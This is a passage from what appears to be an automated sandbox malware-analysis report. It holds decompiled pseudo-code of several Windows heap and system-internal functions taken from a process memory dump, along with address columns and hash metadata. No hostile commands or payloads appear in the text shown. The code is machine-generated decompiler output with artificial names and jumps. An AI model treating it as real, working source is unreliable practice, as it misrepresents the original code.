				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x569d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E055B6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E055EB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x5697b9c; // 0x0
					_t74 = L055C4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E055E9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L055C77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E055EF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E055E13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L055C77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E055E9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                        0x055ac608
                                                                        0x055ac615
                                                                        0x055ac625
                                                                        0x055ac62d
                                                                        0x055ac635
                                                                        0x055ac640
                                                                        0x055ac680
                                                                        0x055ac687
                                                                        0x055ac688
                                                                        0x055ac689
                                                                        0x055ac694
                                                                        0x055ac694
                                                                        0x055ac642
                                                                        0x055ac64a
                                                                        0x055ac697
                                                                        0x05617a25
                                                                        0x05617a2b
                                                                        0x05617a2e
                                                                        0x05617a30
                                                                        0x05617bea
                                                                        0x05617bea
                                                                        0x00000000
                                                                        0x05617bea
                                                                        0x05617a36
                                                                        0x05617a43
                                                                        0x05617a48
                                                                        0x05617a4c
                                                                        0x05617a4e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617a58
                                                                        0x05617a5a
                                                                        0x05617a5b
                                                                        0x05617a5c
                                                                        0x05617a5d
                                                                        0x05617a63
                                                                        0x05617a64
                                                                        0x05617a6a
                                                                        0x05617a6c
                                                                        0x05617a6e
                                                                        0x056179cb
                                                                        0x056179cb
                                                                        0x056179ce
                                                                        0x056179d0
                                                                        0x05617a98
                                                                        0x05617a9b
                                                                        0x05617a9b
                                                                        0x05617a9e
                                                                        0x05617aa1
                                                                        0x05617bbe
                                                                        0x05617bbe
                                                                        0x05617bc0
                                                                        0x05617be0
                                                                        0x05617be0
                                                                        0x05617a01
                                                                        0x05617a01
                                                                        0x05617a05
                                                                        0x05617a07
                                                                        0x05617a15
                                                                        0x05617a15
                                                                        0x05617a1a
                                                                        0x00000000
                                                                        0x05617a1a
                                                                        0x05617bc2
                                                                        0x05617bc6
                                                                        0x05617bc9
                                                                        0x05617bcd
                                                                        0x05617bcf
                                                                        0x056179e6
                                                                        0x056179e6
                                                                        0x056179eb
                                                                        0x056179eb
                                                                        0x056179ef
                                                                        0x056179f1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056179f3
                                                                        0x056179f5
                                                                        0x056179ff
                                                                        0x056179ff
                                                                        0x00000000
                                                                        0x056179ff
                                                                        0x056179f7
                                                                        0x056179fd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056179fd
                                                                        0x05617bd5
                                                                        0x05617bd8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617ba9
                                                                        0x05617bac
                                                                        0x05617bb0
                                                                        0x05617bb1
                                                                        0x05617bb1
                                                                        0x05617bb6
                                                                        0x00000000
                                                                        0x05617bb6
                                                                        0x05617aa7
                                                                        0x05617aaa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617ab2
                                                                        0x05617ab3
                                                                        0x05617ab5
                                                                        0x05617aec
                                                                        0x05617aef
                                                                        0x05617b25
                                                                        0x05617b28
                                                                        0x05617b62
                                                                        0x05617b64
                                                                        0x05617b8f
                                                                        0x05617b92
                                                                        0x05617b96
                                                                        0x05617b98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617b9e
                                                                        0x05617b9f
                                                                        0x05617ba3
                                                                        0x00000000
                                                                        0x05617ba3
                                                                        0x05617b66
                                                                        0x05617b68
                                                                        0x05617ae2
                                                                        0x05617ae2
                                                                        0x00000000
                                                                        0x05617ae2
                                                                        0x05617b6e
                                                                        0x05617b72
                                                                        0x05617b75
                                                                        0x05617b81
                                                                        0x05617b85
                                                                        0x05617b87
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617b31
                                                                        0x05617b34
                                                                        0x05617b3c
                                                                        0x05617b45
                                                                        0x05617b46
                                                                        0x05617b4f
                                                                        0x05617b51
                                                                        0x05617b57
                                                                        0x05617b59
                                                                        0x05617b59
                                                                        0x00000000
                                                                        0x05617b59
                                                                        0x05617b77
                                                                        0x00000000
                                                                        0x05617b77
                                                                        0x05617b2a
                                                                        0x00000000
                                                                        0x05617b2a
                                                                        0x05617af1
                                                                        0x05617af3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617afb
                                                                        0x05617afc
                                                                        0x05617afe
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617b00
                                                                        0x05617b03
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617b05
                                                                        0x05617b09
                                                                        0x05617b0d
                                                                        0x05617b0f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617b18
                                                                        0x05617b1d
                                                                        0x00000000
                                                                        0x05617b1d
                                                                        0x05617ab7
                                                                        0x05617ab9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617abf
                                                                        0x05617ac1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617ac3
                                                                        0x05617ac6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617ac8
                                                                        0x05617acc
                                                                        0x05617ad0
                                                                        0x05617ad2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617adb
                                                                        0x00000000
                                                                        0x05617adb
                                                                        0x056179d6
                                                                        0x056179d9
                                                                        0x056179dc
                                                                        0x05617a91
                                                                        0x05617a94
                                                                        0x00000000
                                                                        0x05617a94
                                                                        0x056179e2
                                                                        0x00000000
                                                                        0x056179e2
                                                                        0x05617a74
                                                                        0x05617a7a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05617a8a
                                                                        0x05617a21
                                                                        0x05617a21
                                                                        0x00000000
                                                                        0x05617a21
                                                                        0x055ac650
                                                                        0x055ac651
                                                                        0x055ac656
                                                                        0x055ac65c
                                                                        0x055ac65d
                                                                        0x055ac663
                                                                        0x055ac664
                                                                        0x055ac66a
                                                                        0x055ac66e
                                                                        0x056179c5
                                                                        0x056179c7
                                                                        0x00000000
                                                                        0x056179c7
                                                                        0x055ac67a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3fca8b4b51c3e81f821a8b4b721eacb21934512895a0d51482b906d8bf395e15
                                                                        • Instruction ID: 09e0aca68b4e285dc90b80ae23e9d2fa18c73cc04d8099ec400040499712981d
                                                                        • Opcode Fuzzy Hash: 3fca8b4b51c3e81f821a8b4b721eacb21934512895a0d51482b906d8bf395e15
                                                                        • Instruction Fuzzy Hash: AE81AE756082068FCB25CE15C880E7A77E6FB84350F18486EFD469B741DB30ED45CBAA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D138B Relevance: .2, Instructions: 206COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E055D138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t97;
				signed int _t102;
				void* _t105;
				char* _t112;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				signed int* _t122;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				char _t150;
				intOrPtr _t153;
				signed int _t161;
				signed int _t163;
				signed int _t170;
				signed int _t175;
				signed int _t176;
				signed int _t182;
				signed int* _t183;
				signed int* _t184;

				_t182 = __ecx;
				_t153 = _a24;
				_t183 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t97 = _t153 - _a16;
				if(_t97 > 0xfffff000) {
					L19:
					return 0;
				}
				asm("cdq");
				_t150 = _a20;
				_v16 = _t97 / 0x1000;
				_t102 = _a4 + 0x00000007 & 0xfffffff8;
				_t170 = _t102 + __edx;
				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
				_t105 = _t170 + 0x28;
				_v12 = _t170;
				if(_t105 >= _t150) {
					if(_t105 >= _t153) {
						goto L19;
					}
					_v8 = _t170 - _t150 + 8;
					_push(E055D0678(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E055E9660() < 0) {
						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
						goto L19;
					}
					if(E055C7D50() == 0) {
						_t112 = 0x7ffe0380;
					} else {
						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0566138A(_t150, _t182, _a20, _v8, 3);
					}
					_t150 = _a20 + _v8;
					_t153 = _a24;
					_a20 = _t150;
				}
				_t183[0] = 1;
				_t113 = _t153 - _t150;
				_t183[1] = 1;
				asm("cdq");
				_t175 = _t113 % 0x1000;
				_v28 = _t113 / 0x1000;
				 *_t183 = _v20;
				_t183[1] =  *(_t182 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t117 = E055D16C7(1, _t175);
					_t150 = _a20;
					_t183[0xd] = _t117;
				}
				_t183[0xb] = _t183[0xb] & 0x00000000;
				_t176 = _v12;
				_t183[3] = _a12;
				_t119 = _a16;
				_t183[7] = _t119;
				_t161 = _v16 << 0xc;
				_t183[6] = _t182;
				_t183[0xa] = _t119 + _t161;
				_t183[8] = _v16;
				_t122 =  &(_t183[0xe]);
				_t183[2] = 0xffeeffee;
				_t183[9] = _t176;
				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
				_t122[1] = _t122;
				 *_t122 = _t122;
				if(_t183[6] != _t183) {
					_t124 = 1;
				} else {
					_t124 = 0;
				}
				_t183[1] = _t124;
				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
				if(_t183[6] != _t183) {
					_t130 = (_t176 - _t183 >> 0x10) + 1;
					_v24 = _t130;
					if(_t130 >= 0xfe) {
						_push(_t161);
						_push(0);
						E0566A80D(_t183[6], 3, _t176, _t183);
						_t150 = _a20;
						_t176 = _v12;
						_t130 = _v24;
					}
				} else {
					_t130 = 0;
				}
				 *(_t176 + 6) = _t130;
				E055CB73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
				}
				if(_v8 != 0) {
					E055CA830(_t182, _v12, _v8);
				}
				_t136 = _t182 + 0xa4;
				_t184 =  &(_t183[4]);
				_t163 =  *(_t136 + 4);
				if( *_t163 != _t136) {
					_push(_t163);
					_push( *_t163);
					E0566A80D(0, 0xd, _t136, 0);
				} else {
					 *_t184 = _t136;
					_t184[1] = _t163;
					 *_t163 = _t184;
					 *(_t136 + 4) = _t184;
				}
				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
				return 1;
			}































                                                                        0x055d139f
                                                                        0x055d13a1
                                                                        0x055d13a4
                                                                        0x055d13a6
                                                                        0x055d13ab
                                                                        0x055d13b3
                                                                        0x05615522
                                                                        0x00000000
                                                                        0x05615522
                                                                        0x055d13b9
                                                                        0x055d13c1
                                                                        0x055d13c4
                                                                        0x055d13cd
                                                                        0x055d13d0
                                                                        0x055d13d9
                                                                        0x055d13dc
                                                                        0x055d13df
                                                                        0x055d13e4
                                                                        0x0561552b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05615534
                                                                        0x0561553f
                                                                        0x05615545
                                                                        0x05615549
                                                                        0x0561554a
                                                                        0x0561554f
                                                                        0x05615550
                                                                        0x05615559
                                                                        0x0561551c
                                                                        0x00000000
                                                                        0x0561551c
                                                                        0x05615562
                                                                        0x05615574
                                                                        0x05615564
                                                                        0x0561556d
                                                                        0x0561556d
                                                                        0x0561557c
                                                                        0x05615597
                                                                        0x05615597
                                                                        0x0561559f
                                                                        0x056155a2
                                                                        0x056155a5
                                                                        0x056155a5
                                                                        0x055d13ec
                                                                        0x055d13f2
                                                                        0x055d13f4
                                                                        0x055d13f8
                                                                        0x055d13fe
                                                                        0x055d1400
                                                                        0x055d1406
                                                                        0x055d1412
                                                                        0x055d1419
                                                                        0x056155b0
                                                                        0x056155b5
                                                                        0x056155b8
                                                                        0x056155b8
                                                                        0x055d1425
                                                                        0x055d1429
                                                                        0x055d142c
                                                                        0x055d142f
                                                                        0x055d1432
                                                                        0x055d1435
                                                                        0x055d143a
                                                                        0x055d143d
                                                                        0x055d1443
                                                                        0x055d1446
                                                                        0x055d1449
                                                                        0x055d1450
                                                                        0x055d1453
                                                                        0x055d1459
                                                                        0x055d145f
                                                                        0x055d1462
                                                                        0x055d1467
                                                                        0x055d14fa
                                                                        0x055d146d
                                                                        0x055d146d
                                                                        0x055d146d
                                                                        0x055d146f
                                                                        0x055d1479
                                                                        0x055d1480
                                                                        0x055d1507
                                                                        0x055d1508
                                                                        0x055d1510
                                                                        0x056155c1
                                                                        0x056155c2
                                                                        0x056155cc
                                                                        0x056155d1
                                                                        0x056155d4
                                                                        0x056155d7
                                                                        0x056155d7
                                                                        0x055d1482
                                                                        0x055d1482
                                                                        0x055d1482
                                                                        0x055d1484
                                                                        0x055d149b
                                                                        0x055d14a4
                                                                        0x055d14ae
                                                                        0x055d14b4
                                                                        0x055d14b4
                                                                        0x055d14ba
                                                                        0x055d14c4
                                                                        0x055d14c4
                                                                        0x055d14c9
                                                                        0x055d14cf
                                                                        0x055d14d2
                                                                        0x055d14d7
                                                                        0x056155df
                                                                        0x056155e0
                                                                        0x056155ea
                                                                        0x055d14dd
                                                                        0x055d14dd
                                                                        0x055d14df
                                                                        0x055d14e2
                                                                        0x055d14e4
                                                                        0x055d14e4
                                                                        0x055d14e7
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                                        • Instruction ID: 841c7068cad13fbb6682a0fb8616502218e780a92531a789c3a244d31dc2e174
                                                                        • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                                        • Instruction Fuzzy Hash: FB817975A00645AFCB24CF68C584AAAFBF6FF98300F14856AE856C7751D730EA41CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05626DC9 Relevance: .2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E05626DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L055C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E05626B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E055C7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E055E9AE0();
					_t87 = L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0562795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0562795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0562795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0562795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L055C4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E05626B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E05626B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E05626B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E05626B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E055C7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E055E9AE0();
								L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L055C2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L055C2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L055C2400( &_v52);
							}
							if(_v28 >= 0) {
								return L055C2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                        0x05626dd4
                                                                        0x05626dde
                                                                        0x05626de1
                                                                        0x05626de3
                                                                        0x05626de6
                                                                        0x05626de9
                                                                        0x05626dec
                                                                        0x05626def
                                                                        0x05626df2
                                                                        0x05626df5
                                                                        0x05626dfe
                                                                        0x05626e04
                                                                        0x05626e09
                                                                        0x05626e0d
                                                                        0x05626e18
                                                                        0x05626e1b
                                                                        0x05626e22
                                                                        0x05626e2d
                                                                        0x05626e30
                                                                        0x05626e36
                                                                        0x05626e42
                                                                        0x05626e4d
                                                                        0x05626e50
                                                                        0x05626e55
                                                                        0x05626e5c
                                                                        0x05626e6e
                                                                        0x05626e5e
                                                                        0x05626e67
                                                                        0x05626e67
                                                                        0x05626e73
                                                                        0x05626e74
                                                                        0x05626e77
                                                                        0x05626e7c
                                                                        0x05626e7d
                                                                        0x05626e8e
                                                                        0x05626e93
                                                                        0x05626e9c
                                                                        0x05626ea8
                                                                        0x05626eab
                                                                        0x05626eac
                                                                        0x05626eb3
                                                                        0x05626ecd
                                                                        0x05626edc
                                                                        0x05626ee2
                                                                        0x05626ee5
                                                                        0x05626ef2
                                                                        0x05626efb
                                                                        0x05626f01
                                                                        0x05626f06
                                                                        0x05626f0b
                                                                        0x05626f11
                                                                        0x05626f1a
                                                                        0x05626f22
                                                                        0x05626f26
                                                                        0x05626f26
                                                                        0x05626f33
                                                                        0x05626f41
                                                                        0x05626f44
                                                                        0x05626f47
                                                                        0x05626f54
                                                                        0x05626f65
                                                                        0x05626f77
                                                                        0x05626f7c
                                                                        0x05626f82
                                                                        0x05626f91
                                                                        0x05626f99
                                                                        0x05626fa3
                                                                        0x05626fae
                                                                        0x05626fae
                                                                        0x05626fba
                                                                        0x05626fbb
                                                                        0x05626fbc
                                                                        0x05626fc1
                                                                        0x05626fc2
                                                                        0x05626fd3
                                                                        0x05626fd8
                                                                        0x05626fd8
                                                                        0x05626fdf
                                                                        0x05626fe8
                                                                        0x05626fee
                                                                        0x05626fee
                                                                        0x05626ff5
                                                                        0x05626ffb
                                                                        0x05626ffb
                                                                        0x05627004
                                                                        0x00000000
                                                                        0x0562700a
                                                                        0x05627004
                                                                        0x05626eb3
                                                                        0x05626e9c
                                                                        0x05627015

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                        • Instruction ID: cafed3e725c90755e2b383ba42cda449ebb6413a27b300b8649d5ac7b4537128
                                                                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                        • Instruction Fuzzy Hash: 01715971E00619EFCB11DFA9C988EAEBBB9FF88710F104069E505E7650DB34AA45CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0563B8D0 Relevance: .2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 39%
                                                                        			E0563B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x5697b9c; // 0x0
				_t124 = L055C4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E055E9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E055E95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E055E95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L055C77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
